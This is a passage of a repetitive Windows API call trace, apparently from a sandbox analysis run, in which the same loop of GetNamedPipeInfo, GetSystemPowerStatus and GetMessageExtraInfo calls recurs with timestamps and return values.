	[0129.491] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.491] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.491] GetMessageExtraInfo () returned 0x0
	[0129.491] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.491] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.491] GetMessageExtraInfo () returned 0x0
	[0129.492] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.492] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.492] GetMessageExtraInfo () returned 0x0
	[0129.493] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.493] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.493] GetMessageExtraInfo () returned 0x0
	[0129.495] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.495] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.495] GetMessageExtraInfo () returned 0x0
	[0129.496] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.496] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.496] GetMessageExtraInfo () returned 0x0
	[0129.498] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.498] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.498] GetMessageExtraInfo () returned 0x0
	[0129.499] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.499] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.499] GetMessageExtraInfo () returned 0x0
	[0129.499] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.499] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.499] GetMessageExtraInfo () returned 0x0
	[0129.500] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.500] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.500] GetMessageExtraInfo () returned 0x0
	[0129.500] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.501] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.501] GetMessageExtraInfo () returned 0x0
	[0129.501] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.501] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.501] GetMessageExtraInfo () returned 0x0
	[0129.502] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.502] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.502] GetMessageExtraInfo () returned 0x0
	[0129.502] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.502] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.502] GetMessageExtraInfo () returned 0x0
	[0129.503] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.503] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.503] GetMessageExtraInfo () returned 0x0
	[0129.509] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.509] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.509] GetMessageExtraInfo () returned 0x0
	[0129.510] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.510] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.510] GetMessageExtraInfo () returned 0x0
	[0129.514] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.604] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.604] GetMessageExtraInfo () returned 0x0
	[0129.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.639] GetMessageExtraInfo () returned 0x0
	[0129.690] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.690] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.690] GetMessageExtraInfo () returned 0x0
	[0129.703] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.703] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.703] GetMessageExtraInfo () returned 0x0
	[0129.743] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.743] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.743] GetMessageExtraInfo () returned 0x0
	[0129.744] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.744] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.744] GetMessageExtraInfo () returned 0x0
	[0129.749] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.749] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.749] GetMessageExtraInfo () returned 0x0
	[0129.756] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.756] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.756] GetMessageExtraInfo () returned 0x0
	[0129.757] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.757] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.757] GetMessageExtraInfo () returned 0x0
	[0129.765] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.765] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.765] GetMessageExtraInfo () returned 0x0
	[0129.767] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.769] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.769] GetMessageExtraInfo () returned 0x0
	[0129.770] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.770] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.770] GetMessageExtraInfo () returned 0x0
	[0129.770] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.770] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.770] GetMessageExtraInfo () returned 0x0
	[0129.771] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.771] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.771] GetMessageExtraInfo () returned 0x0
	[0129.774] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.774] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.774] GetMessageExtraInfo () returned 0x0
	[0129.775] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.775] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.775] GetMessageExtraInfo () returned 0x0
	[0129.776] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.776] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.776] GetMessageExtraInfo () returned 0x0
	[0129.776] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.776] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.776] GetMessageExtraInfo () returned 0x0
	[0129.782] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.782] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.782] GetMessageExtraInfo () returned 0x0
	[0129.783] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.783] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.783] GetMessageExtraInfo () returned 0x0
	[0129.800] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.800] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.800] GetMessageExtraInfo () returned 0x0
	[0129.801] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.801] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.801] GetMessageExtraInfo () returned 0x0
	[0129.802] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.802] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.802] GetMessageExtraInfo () returned 0x0
	[0129.802] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.802] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.802] GetMessageExtraInfo () returned 0x0
	[0129.803] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.803] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.803] GetMessageExtraInfo () returned 0x0
	[0129.803] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.803] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.803] GetMessageExtraInfo () returned 0x0
	[0129.804] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.805] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.805] GetMessageExtraInfo () returned 0x0
	[0129.805] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.805] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.805] GetMessageExtraInfo () returned 0x0
	[0129.806] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.806] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.806] GetMessageExtraInfo () returned 0x0
	[0129.807] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.807] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.807] GetMessageExtraInfo () returned 0x0
	[0129.808] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.808] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.808] GetMessageExtraInfo () returned 0x0
	[0129.809] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.809] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.809] GetMessageExtraInfo () returned 0x0
	[0129.809] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.809] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.809] GetMessageExtraInfo () returned 0x0
	[0129.816] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.816] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.816] GetMessageExtraInfo () returned 0x0
	[0129.817] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.817] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.817] GetMessageExtraInfo () returned 0x0
	[0129.819] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.819] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.819] GetMessageExtraInfo () returned 0x0
	[0129.820] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.820] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.820] GetMessageExtraInfo () returned 0x0
	[0129.821] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.821] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.821] GetMessageExtraInfo () returned 0x0
	[0129.848] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.848] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.848] GetMessageExtraInfo () returned 0x0
	[0129.848] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.848] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.849] GetMessageExtraInfo () returned 0x0
	[0129.849] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.849] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.849] GetMessageExtraInfo () returned 0x0
	[0129.849] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.850] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.850] GetMessageExtraInfo () returned 0x0
	[0129.850] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.850] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.850] GetMessageExtraInfo () returned 0x0
	[0129.850] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.851] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.851] GetMessageExtraInfo () returned 0x0
	[0129.851] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.851] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.851] GetMessageExtraInfo () returned 0x0
	[0129.852] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.852] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.852] GetMessageExtraInfo () returned 0x0
	[0129.852] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.852] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.852] GetMessageExtraInfo () returned 0x0
